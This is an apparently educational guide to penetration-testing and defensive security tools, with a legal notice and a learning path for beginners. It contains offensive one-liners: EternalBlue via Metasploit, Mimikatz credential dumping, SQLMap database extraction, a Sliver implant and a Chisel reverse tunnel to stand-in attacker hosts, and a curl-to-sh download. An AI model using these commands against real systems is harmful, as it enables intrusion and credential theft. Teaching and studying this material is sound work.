▸ FIELD MANUAL // TOOLS & TECHNIQUES

THE HACKER'S
TOOLKIT

Every professional hacker — whether offensive or defensive — relies on a core set of tools. This guide breaks down the most important ones: what they do, how they work, and when to use them. From beginner-friendly scanners to advanced exploitation frameworks.
[ BEGINNER FRIENDLY ] [ INTERMEDIATE ] [ ADVANCED ] [ ETHICAL USE ONLY ]
⚠ LEGAL NOTICE

All tools listed here are for educational purposes and authorized testing only. Using these tools against systems you do not own or have explicit written permission to test is illegal in most countries. Always work within the law — ethical hacking exists to defend systems, not exploit them.

PHASE 1 — RECONNAISSANCE & SCANNING

Before any attack or penetration test begins, the first step is information gathering. Reconnaissance tools help map the target: open ports, running services, operating systems, and potential vulnerabilities. This phase is entirely passive or semi-passive — you're not exploiting anything yet, just listening and mapping.

NETWORK SCANNER
Nmap
BEGINNER
The undisputed king of network scanning. Nmap (Network Mapper) discovers hosts, open ports, running services, and even operating system fingerprints across a network. First released in 1997, it remains the first tool any security professional reaches for. It's free, open-source, and pre-installed on Kali Linux.
nmap -sV -sC -O 192.168.1.0/24
port scanning service detection OS fingerprinting open source
OSINT / PASSIVE RECON
Shodan
BEGINNER
Called "the world's most dangerous search engine," Shodan indexes internet-connected devices — servers, webcams, routers, industrial control systems — and makes them searchable. Type a company name and find their exposed infrastructure without ever touching their systems. Invaluable for OSINT and understanding your own attack surface.
shodan search "apache 2.4.49" country:US
OSINT passive recon IoT web-based
SUBDOMAIN & DNS RECON
Amass
INTERMEDIATE
Amass performs in-depth DNS enumeration to map an organization's external network. It discovers subdomains, ASN information, and network infrastructure through active and passive techniques. Used by red teams and bug bounty hunters to build a complete picture of a target's internet footprint before any direct engagement.
amass enum -d target.com -passive
DNS enumeration subdomains OSINT bug bounty
PACKET ANALYSIS
Wireshark
BEGINNER
The world's most popular network protocol analyzer. Wireshark captures and analyzes network traffic in real time, letting you see exactly what's traveling across a network at the packet level. Essential for understanding protocols, detecting anomalies, and investigating suspicious traffic. Used by both attackers and defenders daily.
wireshark -i eth0 -k
packet capture protocol analysis network forensics GUI

Nmap Cheat Sheet — Essential Commands

# Basic host discovery — find live hosts on a subnet nmap -sn 192.168.1.0/24 # Full port scan with service and version detection nmap -sV -p- 192.168.1.100 # Aggressive scan — OS, version, scripts, traceroute nmap -A 192.168.1.100 # Stealth SYN scan (requires root) — harder to detect sudo nmap -sS 192.168.1.100 # Scan using NSE vulnerability scripts nmap --script vuln 192.168.1.100 # Output results to XML for later parsing nmap -oX results.xml 192.168.1.100

PHASE 2 — WEB APPLICATION TESTING

Web applications are the most commonly targeted attack surface. These tools are designed to probe websites and web APIs for vulnerabilities — from SQL injection and XSS to authentication flaws and misconfigurations. Most modern bug bounty programs focus heavily on web targets.

WEB PROXY / INTERCEPT
Burp Suite
INTERMEDIATE
The industry-standard platform for web application security testing. Burp Suite sits between your browser and the target, intercepting every HTTP request and response. You can modify, replay, fuzz, and analyze traffic in real time. Its scanner automatically detects hundreds of vulnerability classes. The Community edition is free; Professional costs $449/year but is worth every penny for serious testers.
burpsuite & # Launch GUI, set browser proxy to 127.0.0.1:8080
web proxy scanner fuzzing industry standard
DIRECTORY BRUTE FORCING
Gobuster / Feroxbuster
BEGINNER
These tools brute-force hidden files, directories, and subdomains on web servers using wordlists. A target might have an admin panel at /admin, a backup file at /backup.zip, or a staging environment at dev.target.com — none of which are linked publicly. Directory bruting discovers these hidden attack surfaces in minutes.
gobuster dir -u https://target.com -w /usr/share/wordlists/dirb/common.txt
directory bruting wordlists subdomain enum fast
SQL INJECTION
SQLMap
INTERMEDIATE
SQLMap automates the detection and exploitation of SQL injection vulnerabilities. Point it at a URL with a parameter, and it systematically tests dozens of injection techniques — from basic UNION attacks to blind time-based injection. When it finds a vulnerability, it can dump the entire database, extract password hashes, and even escalate to OS shell access.
sqlmap -u "https://target.com/page?id=1" --dbs --batch
SQL injection automated database extraction open source
VULNERABILITY SCANNER
Nikto
BEGINNER
Nikto is an open-source web server scanner that tests for over 6,700 potentially dangerous files and programs. It checks for outdated software versions, server configuration issues, and common security misconfigurations. Not stealthy at all — it generates significant noise in logs — but perfect for quick, comprehensive web server assessments.
nikto -h https://target.com -ssl
web scanner misconfigurations quick assessment noisy

PHASE 3 — EXPLOITATION FRAMEWORKS

Once vulnerabilities are identified, exploitation frameworks provide the tools to verify and demonstrate their impact. These are the most powerful — and most misused — tools in a hacker's arsenal. In professional penetration testing, they're used to prove that a vulnerability is real and exploitable, giving clients concrete evidence to prioritize fixes.

EXPLOITATION FRAMEWORK
Metasploit
INTERMEDIATE
The world's most widely used penetration testing framework. Metasploit contains over 2,000 exploits, hundreds of payloads, and dozens of auxiliary modules. Its modular design lets you combine exploit code with payloads (like Meterpreter shells) to gain access to target systems. Used by security professionals globally for authorized testing and by malicious actors for attacks alike.
msfconsole use exploit/windows/smb/ms17_010_eternalblue set RHOSTS 192.168.1.100 run
exploitation 2000+ exploits payloads post-exploitation
C2 FRAMEWORK
Cobalt Strike
ADVANCED
The gold standard for red team operations and adversary simulation. Cobalt Strike provides a sophisticated command-and-control (C2) infrastructure, allowing operators to manage multiple compromised systems through encrypted channels, pivot through networks, and conduct long-term operations mimicking real APT behavior. Costs $5,900/year per operator — yet cracked versions are rampant in the wild and used in real attacks.
./teamserver [IP] [password] [malleable C2 profile]
C2 framework red team APT simulation commercial
OPEN SOURCE C2
Sliver
ADVANCED
Developed by BishopFox as a free, open-source alternative to Cobalt Strike. Sliver is a cross-platform adversary emulation framework that supports multiple C2 protocols — DNS, HTTP/S, mTLS, and WireGuard. Increasingly adopted by both red teams and, unfortunately, threat actors due to its evasion capabilities and lack of licensing restrictions.
sliver-server generate --http https://your.c2.server --os windows
C2 framework open source cross-platform evasion
PASSWORD CRACKING
Hashcat
INTERMEDIATE
The world's fastest password cracker, leveraging GPU acceleration to test billions of combinations per second. When you dump a database and find hashed passwords (MD5, SHA1, bcrypt, NTLM), Hashcat works to reverse them. Supports dictionary attacks, brute force, rule-based mutation, and combination attacks. A modern GPU can crack a weak MD5 hash in milliseconds.
hashcat -m 0 -a 0 hashes.txt rockyou.txt --rules-file best64.rule
password cracking GPU accelerated hash cracking offline attack
ℹ HOW C2 FRAMEWORKS WORK

A Command & Control (C2) framework has two components: a server controlled by the operator, and an implant (beacon/agent) running on the compromised machine. The implant checks in with the server periodically over encrypted channels, receives tasks, executes them, and returns results — all while blending into normal traffic to avoid detection.

PHASE 4 — POST-EXPLOITATION & PRIVILEGE ESCALATION

After gaining initial access, attackers move to expand their foothold. Post-exploitation tools help enumerate the local system, escalate privileges from a standard user to administrator or SYSTEM, and move laterally through the network. This phase determines how far an attacker can penetrate and what damage they can ultimately do.

PRIVESC / AD ATTACKS
BloodHound
ADVANCED
BloodHound uses graph theory to reveal hidden relationships within Active Directory environments that would be invisible to a human analyst. It maps attack paths from a standard user account to Domain Admin, identifying misconfigurations, over-privileged accounts, and delegation issues. Red teams use it to find the path of least resistance; blue teams use it to identify and eliminate those paths before attackers do.
SharpHound.exe --CollectionMethods All # Import ZIP into BloodHound GUI for graph analysis
Active Directory privilege escalation graph analysis red & blue team
WINDOWS CREDENTIAL DUMPING
Mimikatz
ADVANCED
Created by French security researcher Benjamin Delpy, Mimikatz became infamous for its ability to extract plaintext passwords, hashes, PIN codes, and Kerberos tickets from Windows memory. A single command run with admin rights can reveal every credential currently cached on a Windows system. It fundamentally changed how the industry thought about Windows authentication security and forced Microsoft to implement significant mitigations.
privilege::debug sekurlsa::logonpasswords lsadump::sam
credential dumping Windows pass-the-hash Kerberos
LINUX PRIVESC
LinPEAS / WinPEAS
BEGINNER
PEASS (Privilege Escalation Awesome Scripts Suite) automatically searches for privilege escalation vectors on Linux and Windows systems. After gaining a low-privilege shell, running LinPEAS checks hundreds of potential escalation paths — SUID binaries, writable cron jobs, weak file permissions, exploitable kernel versions, and misconfigurations — then color-codes results by severity. The fastest way to understand what escalation paths exist.
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh
privilege escalation Linux & Windows automated enumeration
NETWORK PIVOTING
Chisel / Ligolo-ng
ADVANCED
Pivoting tools create tunnels through compromised hosts to reach otherwise inaccessible network segments. When you compromise a machine that sits between two networks, Chisel or Ligolo-ng lets you route your attack traffic through it — effectively making internal systems reachable from your external attack machine. Critical for multi-hop penetration tests and network segmentation testing.
./chisel server -p 8080 --reverse ./chisel client attacker.com:8080 R:socks
tunneling pivoting SOCKS proxy network segmentation

THE OTHER SIDE — DEFENSIVE & FORENSIC TOOLS

Security isn't just about offense. Defenders use their own specialized tools to detect intrusions, analyze malware, investigate incidents, and harden systems. The best offensive security professionals understand both sides deeply — knowing how defenders detect attacks makes attackers better, and knowing how attackers operate makes defenders more effective.

SIEM / LOG ANALYSIS
Splunk / ELK Stack
INTERMEDIATE
Security Information and Event Management (SIEM) platforms aggregate logs from every system in an environment — firewalls, endpoints, servers, cloud — and correlate them to detect attack patterns. Splunk is the enterprise standard; the ELK Stack (Elasticsearch, Logstash, Kibana) is the popular open-source alternative. A skilled analyst can detect APTs hiding in an ocean of log data.
index=windows EventCode=4625 | stats count by src_ip
SIEM log analysis threat detection SOC
MALWARE ANALYSIS
Ghidra / IDA Pro
ADVANCED
Reverse engineering tools that disassemble and decompile binary executables to understand how they work. When a new piece of malware is discovered, analysts use Ghidra (free, from NSA) or IDA Pro (industry standard, expensive) to tear it apart — understanding its functionality, C2 communication, persistence mechanisms, and evasion techniques. Essential for malware analysts and reverse engineers.
ghidra & # Launch GUI, import malware sample for analysis
reverse engineering malware analysis disassembly binary analysis
VULNERABILITY SCANNING
Nessus / OpenVAS
BEGINNER
Comprehensive vulnerability scanners that assess systems against thousands of known CVEs. Point them at your network and they return a prioritized list of vulnerabilities — rated by severity — with remediation guidance. Nessus is the commercial standard used in most enterprises; OpenVAS is the free, open-source alternative. Essential for vulnerability management programs.
openvas-start # Access GUI at https://localhost:9392
vulnerability scanning CVE detection compliance enterprise
DIGITAL FORENSICS
Autopsy / Volatility
ADVANCED
Forensic tools for investigating incidents after the fact. Autopsy performs disk forensics — recovering deleted files, analyzing browser history, examining file system artifacts. Volatility analyzes memory dumps to find running malware, hidden processes, and network connections that existed at the time of capture. Together they form the core of any incident response investigation.
volatility -f memory.dmp --profile=Win10x64 pslist volatility -f memory.dmp --profile=Win10x64 netscan
forensics memory analysis incident response artifact recovery

QUICK REFERENCE — TOOL COMPARISON

A concise overview of the most essential tools, their primary use case, and recommended skill level for each.

TOOLPRIMARY USEOSCOSTLEVEL
NmapNetwork & port scanningAllFreeBeginner
WiresharkPacket capture & analysisAllFreeBeginner
Burp SuiteWeb application testingAllFree / $449/yrIntermediate
MetasploitExploitation frameworkAllFree / ProIntermediate
HashcatPassword crackingAllFreeIntermediate
SQLMapSQL injection automationAllFreeIntermediate
BloodHoundActive Directory attack pathsWindows/LinuxFreeAdvanced
Cobalt StrikeRed team C2 operationsLinux$5,900/yrAdvanced
MimikatzWindows credential dumpingWindowsFreeAdvanced
GhidraReverse engineeringAllFreeAdvanced
NessusVulnerability scanningAllFree / $3,990/yrBeginner
ShodanOSINT / internet reconWebFree / PaidBeginner

WHERE TO START — YOUR LEARNING PATH

The number of tools available is overwhelming for beginners. Here's a structured path that builds skills progressively — starting with fundamentals and building toward advanced techniques used by professional penetration testers.

01

MASTER THE FUNDAMENTALS

Before touching any hacking tool, understand networking (TCP/IP, DNS, HTTP), Linux command line, and basic scripting in Python or Bash. Without this foundation, you're just copying commands without understanding what they do. Spend 1-3 months here.

02

LEARN NMAP & WIRESHARK DEEPLY

These two tools teach you more about networking than any textbook. Scan your own home network with every Nmap flag until you understand what each one does. Capture your own traffic with Wireshark and learn to read packet headers. This is where real understanding begins.

03

START ON HACK THE BOX OR TRYHACKME

These platforms provide legal, structured environments to practice offensive tools safely. TryHackMe has guided learning paths for beginners; Hack The Box has more realistic, CTF-style machines. Work through at least 20-30 machines before moving on. This is where tool knowledge becomes practical skill.

04

BUILD A HOME LAB

Set up a virtualized environment with Kali Linux as your attack machine and intentionally vulnerable systems (Metasploitable, DVWA, VulnHub machines) as targets. Practice every tool in a controlled environment where mistakes are learning opportunities, not legal problems.

05

PURSUE CERTIFICATIONS

CompTIA Security+ for foundational knowledge. Then eJPT (eLearnSecurity Junior Penetration Tester) for your first hands-on cert. Eventually work toward OSCP (Offensive Security Certified Professional) — the gold standard for penetration testers, requiring you to compromise multiple machines in a 24-hour exam.

ℹ RECOMMENDED PLATFORMS

TryHackMe — best for absolute beginners, guided learning paths.
Hack The Box — realistic machines, active community, industry recognition.
PicoCTF — free, beginner-friendly CTF competitions from Carnegie Mellon.
PortSwigger Web Academy — the definitive free resource for web application hacking.